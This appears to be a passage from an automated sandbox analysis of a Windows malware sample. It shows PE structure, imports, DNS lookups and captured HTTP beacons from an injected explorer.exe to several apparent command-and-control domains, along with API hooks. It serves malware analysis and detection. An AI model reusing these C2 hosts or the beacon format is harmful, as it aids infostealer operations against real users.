                                              Data Directories

                                              NameVirtual AddressVirtual Size Is in Section
                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_IMPORT0x1db940xdc.rdata
                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0x250000x1a78.rsrc
                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x270000x1150.reloc
                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x1d6e00x40.rdata
                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_IAT0x180000x1c8.rdata
                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                              Sections

                                              NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                              .text0x10000x16d9a0x16e00False0.571176997951data6.6738730891IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                              .rdata0x180000x64f80x6600False0.572227328431data6.01779519415IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                              .data0x1f0000x50980x3400False0.285531850962data4.70097691284IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                              .rsrc0x250000x1a780x1c00False0.9453125data7.75466359197IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                              .reloc0x270000x17980x1800False0.606770833333data5.55476531064IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                              Resources

                                              NameRVASizeTypeLanguageCountry
                                              RT_RCDATA0x250700x1a05dataEnglishUnited States

                                              Imports

                                              DLLImport
                                              KERNEL32.dllRaiseException, ReadConsoleW, ReadFile, CreateFileW, WriteConsoleW, GetStringTypeW, LCMapStringEx, SetConsoleCursorPosition, LoadLibraryW, GetModuleHandleW, HeapReAlloc, HeapSize, OutputDebugStringW, SetFilePointerEx, GetConsoleMode, GetConsoleCP, FlushFileBuffers, SetStdHandle, WideCharToMultiByte, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetProcessHeap, HeapAlloc, GetStdHandle, GetTickCount64, GetSystemTimeAsFileTime, QueryPerformanceCounter, GetModuleFileNameA, GetCurrentThreadId, SetLastError, GetCPInfo, GetOEMCP, GetACP, EncodePointer, DecodePointer, GetLastError, InterlockedDecrement, ExitProcess, GetModuleHandleExW, GetProcAddress, AreFileApisANSI, MultiByteToWideChar, GetLocalTime, GetCommandLineA, IsDebuggerPresent, IsProcessorFeaturePresent, EnterCriticalSection, LeaveCriticalSection, CloseHandle, HeapFree, InitializeCriticalSectionAndSpinCount, RtlUnwind, GetFileType, DeleteCriticalSection, InitOnceExecuteOnce, GetStartupInfoW, UnhandledExceptionFilter, SetUnhandledExceptionFilter, FlsAlloc, FlsGetValue, FlsSetValue, FlsFree, GetCurrentProcess, TerminateProcess, WriteFile, GetModuleFileNameW, Sleep, LoadLibraryExW, InterlockedIncrement, IsValidCodePage, SetEndOfFile
                                              msi.dll
                                              loadperf.dllLoadPerfCounterTextStringsA, UnloadPerfCounterTextStringsW, UnloadPerfCounterTextStringsA
                                              MSVFW32.dllStretchDIB
                                              AVIFIL32.dllAVIFileExit, AVIStreamReadData
                                              pdh.dllPdhEnumObjectsW, PdhSetQueryTimeRange, PdhGetDllVersion
                                              WSOCK32.dllWSASetBlockingHook, WSACancelAsyncRequest, bind, ord1104, ord1108, ord1130
                                              GDI32.dllStartDocW, GdiGetSpoolFileHandle, PolyBezier
                                              MAPI32.dll
                                              MSACM32.dllacmDriverPriority, acmFilterTagDetailsA

                                              Possible Origin

                                              Language of compilation systemCountry where language is spokenMap
                                              EnglishUnited States

                                              Network Behavior

                                              Snort IDS Alerts

                                              TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                              01/13/21-21:26:33.276386TCP1201ATTACK-RESPONSES 403 Forbidden804975934.102.136.180192.168.2.4
                                              01/13/21-21:28:17.122550TCP1201ATTACK-RESPONSES 403 Forbidden804976934.102.136.180192.168.2.4

                                              Network Port Distribution

                                              TCP Packets

                                              TimestampSource PortDest PortSource IPDest IP
                                              Jan 13, 2021 21:26:33.097670078 CET4975980192.168.2.434.102.136.180
                                              Jan 13, 2021 21:26:33.137716055 CET804975934.102.136.180192.168.2.4
                                              Jan 13, 2021 21:26:33.137829065 CET4975980192.168.2.434.102.136.180
                                              Jan 13, 2021 21:26:33.137989044 CET4975980192.168.2.434.102.136.180
                                              Jan 13, 2021 21:26:33.177892923 CET804975934.102.136.180192.168.2.4
                                              Jan 13, 2021 21:26:33.276386023 CET804975934.102.136.180192.168.2.4
                                              Jan 13, 2021 21:26:33.276506901 CET804975934.102.136.180192.168.2.4
                                              Jan 13, 2021 21:26:33.276700974 CET4975980192.168.2.434.102.136.180
                                              Jan 13, 2021 21:26:33.276757002 CET4975980192.168.2.434.102.136.180
                                              Jan 13, 2021 21:26:33.317466021 CET804975934.102.136.180192.168.2.4
                                              Jan 13, 2021 21:27:14.839076042 CET4976780192.168.2.4172.96.186.206
                                              Jan 13, 2021 21:27:14.963711977 CET8049767172.96.186.206192.168.2.4
                                              Jan 13, 2021 21:27:14.964004040 CET4976780192.168.2.4172.96.186.206
                                              Jan 13, 2021 21:27:14.964339018 CET4976780192.168.2.4172.96.186.206
                                              Jan 13, 2021 21:27:15.088922024 CET8049767172.96.186.206192.168.2.4
                                              Jan 13, 2021 21:27:15.469309092 CET4976780192.168.2.4172.96.186.206
                                              Jan 13, 2021 21:27:15.639761925 CET8049767172.96.186.206192.168.2.4
                                              Jan 13, 2021 21:27:17.656807899 CET8049767172.96.186.206192.168.2.4
                                              Jan 13, 2021 21:27:17.656835079 CET8049767172.96.186.206192.168.2.4
                                              Jan 13, 2021 21:27:17.656851053 CET8049767172.96.186.206192.168.2.4
                                              Jan 13, 2021 21:27:17.656866074 CET8049767172.96.186.206192.168.2.4
                                              Jan 13, 2021 21:27:17.656888962 CET8049767172.96.186.206192.168.2.4
                                              Jan 13, 2021 21:27:17.656908989 CET8049767172.96.186.206192.168.2.4
                                              Jan 13, 2021 21:27:17.656928062 CET8049767172.96.186.206192.168.2.4
                                              Jan 13, 2021 21:27:17.656944990 CET8049767172.96.186.206192.168.2.4
                                              Jan 13, 2021 21:27:17.656949043 CET4976780192.168.2.4172.96.186.206
                                              Jan 13, 2021 21:27:17.656961918 CET8049767172.96.186.206192.168.2.4
                                              Jan 13, 2021 21:27:17.656975031 CET8049767172.96.186.206192.168.2.4
                                              Jan 13, 2021 21:27:17.656976938 CET4976780192.168.2.4172.96.186.206
                                              Jan 13, 2021 21:27:17.657040119 CET4976780192.168.2.4172.96.186.206
                                              Jan 13, 2021 21:27:17.657052040 CET4976780192.168.2.4172.96.186.206
                                              Jan 13, 2021 21:27:56.262149096 CET4976880192.168.2.4198.54.117.217
                                              Jan 13, 2021 21:27:56.454626083 CET8049768198.54.117.217192.168.2.4
                                              Jan 13, 2021 21:27:56.454735041 CET4976880192.168.2.4198.54.117.217
                                              Jan 13, 2021 21:27:56.454940081 CET4976880192.168.2.4198.54.117.217
                                              Jan 13, 2021 21:27:56.647383928 CET8049768198.54.117.217192.168.2.4
                                              Jan 13, 2021 21:27:56.647411108 CET8049768198.54.117.217192.168.2.4
                                              Jan 13, 2021 21:28:16.939611912 CET4976980192.168.2.434.102.136.180
                                              Jan 13, 2021 21:28:16.979912996 CET804976934.102.136.180192.168.2.4
                                              Jan 13, 2021 21:28:16.980845928 CET4976980192.168.2.434.102.136.180
                                              Jan 13, 2021 21:28:16.982839108 CET4976980192.168.2.434.102.136.180
                                              Jan 13, 2021 21:28:17.023057938 CET804976934.102.136.180192.168.2.4
                                              Jan 13, 2021 21:28:17.122550011 CET804976934.102.136.180192.168.2.4
                                              Jan 13, 2021 21:28:17.122571945 CET804976934.102.136.180192.168.2.4
                                              Jan 13, 2021 21:28:17.123596907 CET4976980192.168.2.434.102.136.180
                                              Jan 13, 2021 21:28:17.124424934 CET4976980192.168.2.434.102.136.180
                                              Jan 13, 2021 21:28:17.165519953 CET804976934.102.136.180192.168.2.4

                                              UDP Packets

                                              TimestampSource PortDest PortSource IPDest IP
                                              Jan 13, 2021 21:25:26.313123941 CET5370053192.168.2.48.8.8.8
                                              Jan 13, 2021 21:25:26.361131907 CET53537008.8.8.8192.168.2.4
                                              Jan 13, 2021 21:25:27.104875088 CET5172653192.168.2.48.8.8.8
                                              Jan 13, 2021 21:25:27.158407927 CET53517268.8.8.8192.168.2.4
                                              Jan 13, 2021 21:25:28.452390909 CET5679453192.168.2.48.8.8.8
                                              Jan 13, 2021 21:25:28.500507116 CET53567948.8.8.8192.168.2.4
                                              Jan 13, 2021 21:25:29.828567982 CET5653453192.168.2.48.8.8.8
                                              Jan 13, 2021 21:25:29.885067940 CET53565348.8.8.8192.168.2.4
                                              Jan 13, 2021 21:25:31.100845098 CET5662753192.168.2.48.8.8.8
                                              Jan 13, 2021 21:25:31.151740074 CET53566278.8.8.8192.168.2.4
                                              Jan 13, 2021 21:25:32.368196011 CET5662153192.168.2.48.8.8.8
                                              Jan 13, 2021 21:25:32.422194004 CET53566218.8.8.8192.168.2.4
                                              Jan 13, 2021 21:25:33.275630951 CET6311653192.168.2.48.8.8.8
                                              Jan 13, 2021 21:25:33.323690891 CET53631168.8.8.8192.168.2.4
                                              Jan 13, 2021 21:25:34.621407986 CET6407853192.168.2.48.8.8.8
                                              Jan 13, 2021 21:25:34.672171116 CET53640788.8.8.8192.168.2.4
                                              Jan 13, 2021 21:25:35.550206900 CET6480153192.168.2.48.8.8.8
                                              Jan 13, 2021 21:25:35.598148108 CET53648018.8.8.8192.168.2.4
                                              Jan 13, 2021 21:25:36.332773924 CET6172153192.168.2.48.8.8.8
                                              Jan 13, 2021 21:25:36.380810976 CET53617218.8.8.8192.168.2.4
                                              Jan 13, 2021 21:25:53.075989962 CET5125553192.168.2.48.8.8.8
                                              Jan 13, 2021 21:25:53.126849890 CET53512558.8.8.8192.168.2.4
                                              Jan 13, 2021 21:26:14.372950077 CET6152253192.168.2.48.8.8.8
                                              Jan 13, 2021 21:26:14.432109118 CET53615228.8.8.8192.168.2.4
                                              Jan 13, 2021 21:26:15.059200048 CET5233753192.168.2.48.8.8.8
                                              Jan 13, 2021 21:26:15.115607023 CET53523378.8.8.8192.168.2.4
                                              Jan 13, 2021 21:26:15.769350052 CET5504653192.168.2.48.8.8.8
                                              Jan 13, 2021 21:26:15.828141928 CET53550468.8.8.8192.168.2.4
                                              Jan 13, 2021 21:26:16.510773897 CET4961253192.168.2.48.8.8.8
                                              Jan 13, 2021 21:26:16.567265987 CET53496128.8.8.8192.168.2.4
                                              Jan 13, 2021 21:26:17.014070988 CET4928553192.168.2.48.8.8.8
                                              Jan 13, 2021 21:26:17.070439100 CET53492858.8.8.8192.168.2.4
                                              Jan 13, 2021 21:26:17.286334038 CET5060153192.168.2.48.8.8.8
                                              Jan 13, 2021 21:26:17.345649004 CET53506018.8.8.8192.168.2.4
                                              Jan 13, 2021 21:26:17.577235937 CET6087553192.168.2.48.8.8.8
                                              Jan 13, 2021 21:26:17.628079891 CET53608758.8.8.8192.168.2.4
                                              Jan 13, 2021 21:26:18.187264919 CET5644853192.168.2.48.8.8.8
                                              Jan 13, 2021 21:26:18.270222902 CET53564488.8.8.8192.168.2.4
                                              Jan 13, 2021 21:26:18.918555021 CET5917253192.168.2.48.8.8.8
                                              Jan 13, 2021 21:26:18.969310999 CET53591728.8.8.8192.168.2.4
                                              Jan 13, 2021 21:26:19.880409002 CET6242053192.168.2.48.8.8.8
                                              Jan 13, 2021 21:26:19.928311110 CET53624208.8.8.8192.168.2.4
                                              Jan 13, 2021 21:26:20.811372995 CET6057953192.168.2.48.8.8.8
                                              Jan 13, 2021 21:26:20.861788034 CET53605798.8.8.8192.168.2.4
                                              Jan 13, 2021 21:26:21.446341038 CET5018353192.168.2.48.8.8.8
                                              Jan 13, 2021 21:26:21.544389009 CET53501838.8.8.8192.168.2.4
                                              Jan 13, 2021 21:26:33.011740923 CET6153153192.168.2.48.8.8.8
                                              Jan 13, 2021 21:26:33.091243029 CET53615318.8.8.8192.168.2.4
                                              Jan 13, 2021 21:26:33.881355047 CET4922853192.168.2.48.8.8.8
                                              Jan 13, 2021 21:26:33.941781044 CET53492288.8.8.8192.168.2.4
                                              Jan 13, 2021 21:26:53.489366055 CET5979453192.168.2.48.8.8.8
                                              Jan 13, 2021 21:26:53.588946104 CET53597948.8.8.8192.168.2.4
                                              Jan 13, 2021 21:27:06.181643963 CET5591653192.168.2.48.8.8.8
                                              Jan 13, 2021 21:27:06.229589939 CET53559168.8.8.8192.168.2.4
                                              Jan 13, 2021 21:27:08.425323009 CET5275253192.168.2.48.8.8.8
                                              Jan 13, 2021 21:27:08.494129896 CET53527528.8.8.8192.168.2.4
                                              Jan 13, 2021 21:27:14.754261017 CET6054253192.168.2.48.8.8.8
                                              Jan 13, 2021 21:27:14.836515903 CET53605428.8.8.8192.168.2.4
                                              Jan 13, 2021 21:27:35.661072016 CET6068953192.168.2.48.8.8.8
                                              Jan 13, 2021 21:27:36.019072056 CET53606898.8.8.8192.168.2.4
                                              Jan 13, 2021 21:27:56.201952934 CET6420653192.168.2.48.8.8.8
                                              Jan 13, 2021 21:27:56.261003017 CET53642068.8.8.8192.168.2.4
                                              Jan 13, 2021 21:28:16.858023882 CET5090453192.168.2.48.8.8.8
                                              Jan 13, 2021 21:28:16.932145119 CET53509048.8.8.8192.168.2.4
                                              Jan 13, 2021 21:28:39.854707003 CET5752553192.168.2.48.8.8.8
                                              Jan 13, 2021 21:28:40.007352114 CET53575258.8.8.8192.168.2.4

                                              DNS Queries

                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                              Jan 13, 2021 21:26:33.011740923 CET192.168.2.48.8.8.80xdb25Standard query (0)www.millcityloam.comA (IP address)IN (0x0001)
                                              Jan 13, 2021 21:26:53.489366055 CET192.168.2.48.8.8.80x5ae5Standard query (0)www.jacmkt.comA (IP address)IN (0x0001)
                                              Jan 13, 2021 21:27:14.754261017 CET192.168.2.48.8.8.80xbe02Standard query (0)www.achonabu.comA (IP address)IN (0x0001)
                                              Jan 13, 2021 21:27:35.661072016 CET192.168.2.48.8.8.80x117bStandard query (0)www.zhaowulu.comA (IP address)IN (0x0001)
                                              Jan 13, 2021 21:27:56.201952934 CET192.168.2.48.8.8.80x5b2aStandard query (0)www.a-zsolutionsllc.comA (IP address)IN (0x0001)
                                              Jan 13, 2021 21:28:16.858023882 CET192.168.2.48.8.8.80xa49cStandard query (0)www.nationshiphop.comA (IP address)IN (0x0001)
                                              Jan 13, 2021 21:28:39.854707003 CET192.168.2.48.8.8.80x733Standard query (0)www.hwcailing.comA (IP address)IN (0x0001)

                                              DNS Answers

                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                              Jan 13, 2021 21:26:33.091243029 CET8.8.8.8192.168.2.40xdb25No error (0)www.millcityloam.commillcityloam.comCNAME (Canonical name)IN (0x0001)
                                              Jan 13, 2021 21:26:33.091243029 CET8.8.8.8192.168.2.40xdb25No error (0)millcityloam.com34.102.136.180A (IP address)IN (0x0001)
                                              Jan 13, 2021 21:26:53.588946104 CET8.8.8.8192.168.2.40x5ae5Name error (3)www.jacmkt.comnonenoneA (IP address)IN (0x0001)
                                              Jan 13, 2021 21:27:14.836515903 CET8.8.8.8192.168.2.40xbe02No error (0)www.achonabu.com172.96.186.206A (IP address)IN (0x0001)
                                              Jan 13, 2021 21:27:56.261003017 CET8.8.8.8192.168.2.40x5b2aNo error (0)www.a-zsolutionsllc.comparkingpage.namecheap.comCNAME (Canonical name)IN (0x0001)
                                              Jan 13, 2021 21:27:56.261003017 CET8.8.8.8192.168.2.40x5b2aNo error (0)parkingpage.namecheap.com198.54.117.217A (IP address)IN (0x0001)
                                              Jan 13, 2021 21:27:56.261003017 CET8.8.8.8192.168.2.40x5b2aNo error (0)parkingpage.namecheap.com198.54.117.215A (IP address)IN (0x0001)
                                              Jan 13, 2021 21:27:56.261003017 CET8.8.8.8192.168.2.40x5b2aNo error (0)parkingpage.namecheap.com198.54.117.210A (IP address)IN (0x0001)
                                              Jan 13, 2021 21:27:56.261003017 CET8.8.8.8192.168.2.40x5b2aNo error (0)parkingpage.namecheap.com198.54.117.211A (IP address)IN (0x0001)
                                              Jan 13, 2021 21:27:56.261003017 CET8.8.8.8192.168.2.40x5b2aNo error (0)parkingpage.namecheap.com198.54.117.216A (IP address)IN (0x0001)
                                              Jan 13, 2021 21:27:56.261003017 CET8.8.8.8192.168.2.40x5b2aNo error (0)parkingpage.namecheap.com198.54.117.212A (IP address)IN (0x0001)
                                              Jan 13, 2021 21:27:56.261003017 CET8.8.8.8192.168.2.40x5b2aNo error (0)parkingpage.namecheap.com198.54.117.218A (IP address)IN (0x0001)
                                              Jan 13, 2021 21:28:16.932145119 CET8.8.8.8192.168.2.40xa49cNo error (0)www.nationshiphop.comnationshiphop.comCNAME (Canonical name)IN (0x0001)
                                              Jan 13, 2021 21:28:16.932145119 CET8.8.8.8192.168.2.40xa49cNo error (0)nationshiphop.com34.102.136.180A (IP address)IN (0x0001)
                                              Jan 13, 2021 21:28:40.007352114 CET8.8.8.8192.168.2.40x733No error (0)www.hwcailing.com107.160.136.152A (IP address)IN (0x0001)

                                              HTTP Request Dependency Graph

                                              • www.millcityloam.com
                                              • www.achonabu.com
                                              • www.a-zsolutionsllc.com
                                              • www.nationshiphop.com

                                              HTTP Packets

                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              0192.168.2.44975934.102.136.18080C:\Windows\explorer.exe
                                              TimestampkBytes transferredDirectionData
                                              Jan 13, 2021 21:26:33.137989044 CET1103OUTGET /hko6/?OHiLR=jJBpdVbhUrMh9TJP&k2JxoV=9ExSQ4NEk+xqeDwz7kz53SpWI5tzJaWW64EQQFdVNavty5IFfZu+ty07sGNE8SwhRq/4 HTTP/1.1
                                              Host: www.millcityloam.com
                                              Connection: close
                                              Data Raw: 00 00 00 00 00 00 00
                                              Data Ascii:
                                              Jan 13, 2021 21:26:33.276386023 CET1105INHTTP/1.1 403 Forbidden
                                              Server: openresty
                                              Date: Wed, 13 Jan 2021 20:26:33 GMT
                                              Content-Type: text/html
                                              Content-Length: 275
                                              ETag: "5ffc838f-113"
                                              Via: 1.1 google
                                              Connection: close
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                              Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              1192.168.2.449767172.96.186.20680C:\Windows\explorer.exe
                                              TimestampkBytes transferredDirectionData
                                              Jan 13, 2021 21:27:14.964339018 CET4038OUTGET /hko6/?OHiLR=jJBpdVbhUrMh9TJP&k2JxoV=Ds6mycG6XVC6cOnx6IQpHboGdSODTK5baT5OF1Gnzp/H9CBW+9tUucbuBNfXcxevyFer HTTP/1.1
                                              Host: www.achonabu.com
                                              Connection: close
                                              Data Raw: 00 00 00 00 00 00 00
                                              Data Ascii:
                                              Jan 13, 2021 21:27:17.656807899 CET4039INHTTP/1.1 404 Not Found
                                              Connection: close
                                              X-Powered-By: PHP/5.6.40
                                              Content-Type: text/html; charset=UTF-8
                                              X-UA-Compatible: IE=edge
                                              Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                              Cache-Control: no-cache, must-revalidate, max-age=0
                                              Link: <https://abccarpetcare.com/wp-json/>; rel="https://api.w.org/"
                                              X-LiteSpeed-Cache-Control: public,max-age=3600
                                              X-LiteSpeed-Tag: 2cd_404,2cd_URL.8baa36f0385195f985698a5c3d8ac84b,2cd_ERR.404,2cd_
                                              X-Litespeed-Cache: miss
                                              Transfer-Encoding: chunked
                                              Date: Wed, 13 Jan 2021 20:27:17 GMT
                                              Server: LiteSpeed
                                              Data Raw: 34 35 37 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 20 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 69 6e 67 62 61 63 6b 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 61 62 63 63 61 72 70 65 74 63 61 72 65 2e 63 6f 6d 2f 78 6d 6c 72 70 63 2e 70 68 70 22 3e 0a 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 41 42 43 20 43 61 72 70 65 74 20 43 61 72 65 20 26 23 38 32 31 31 3b 20 41 42 43 20 52 75 67 20 43 6c 65 61 6e 69 6e 67 20 4e 59 43 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 67 65 6e 65 72 61 74 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 54 6f 74 61 6c 20 57 6f 72 64 50 72 65 73 73 20 54 68 65 6d 65 20 33 2e 36 2e 30 22 20 2f 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 61 62 63 63 61 72 70 65 74 63 61 72 65 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 73 2e 77 2e 6f 72 67 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 41 42 43 20 43 61 72 70 65 74 20 43 61 72 65 20 2d 20 41 42 43 20 52 75 67 20 43 6c 65 61 6e 69 6e 67 20 4e 59 43 20 26 72 61 71 75 6f 3b 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 61 62 63 63 61 72 70 65 74 63 61 72 65 2e 63 6f 6d 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 41 42 43 20 43 61 72 70 65 74 20 43 61 72 65 20 2d 20 41 42 43 20 52
                                              Data Ascii: 457d<!DOCTYPE html><html lang="en-US" ><head><meta charset="UTF-8" /><link rel="profile" href="http://gmpg.org/xfn/11"><link rel="pingback" href="http://abccarpetcare.com/xmlrpc.php"><title>Page not found &#8211; ABC Carpet Care &#8211; ABC Rug Cleaning NYC</title><meta name="viewport" content="width=device-width, initial-scale=1"><meta name="generator" content="Total WordPress Theme 3.6.0" /><link rel='dns-prefetch' href='//abccarpetcare.com' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel='dns-prefetch' href='//s.w.org' /><link rel="alternate" type="application/rss+xml" title="ABC Carpet Care - ABC Rug Cleaning NYC &raquo; Feed" href="https://abccarpetcare.com/feed/" /><link rel="alternate" type="application/rss+xml" title="ABC Carpet Care - ABC R


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              2192.168.2.449768198.54.117.21780C:\Windows\explorer.exe
                                              TimestampkBytes transferredDirectionData
                                              Jan 13, 2021 21:27:56.454940081 CET4054OUTGET /hko6/?OHiLR=jJBpdVbhUrMh9TJP&k2JxoV=eHiVknBCI+BDKnmhqMCE00F5l7UznldHUBBF08pOLsPmMyvxBhFlr4jwGXO1VYCPd09p HTTP/1.1
                                              Host: www.a-zsolutionsllc.com
                                              Connection: close
                                              Data Raw: 00 00 00 00 00 00 00
                                              Data Ascii:


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              3192.168.2.44976934.102.136.18080C:\Windows\explorer.exe
                                              TimestampkBytes transferredDirectionData
                                              Jan 13, 2021 21:28:16.982839108 CET4055OUTGET /hko6/?k2JxoV=oEk1uwcTzyLRlLIEQvULAWzRIM6BrJQxm2nmuYWQkJ+zIoa1KldNyrAb+1j5GiVi4vc4&OHiLR=jJBpdVbhUrMh9TJP HTTP/1.1
                                              Host: www.nationshiphop.com
                                              Connection: close
                                              Data Raw: 00 00 00 00 00 00 00
                                              Data Ascii:
                                              Jan 13, 2021 21:28:17.122550011 CET4055INHTTP/1.1 403 Forbidden
                                              Server: openresty
                                              Date: Wed, 13 Jan 2021 20:28:17 GMT
                                              Content-Type: text/html
                                              Content-Length: 275
                                              ETag: "5ffc838f-113"
                                              Via: 1.1 google
                                              Connection: close
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                              Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                              Code Manipulations

                                              User Modules

                                              Hook Summary

                                              Function NameHook TypeActive in Processes
                                              PeekMessageAINLINEexplorer.exe
                                              PeekMessageWINLINEexplorer.exe
                                              GetMessageWINLINEexplorer.exe
                                              GetMessageAINLINEexplorer.exe

                                              Processes

                                              Process: explorer.exe, Module: user32.dll
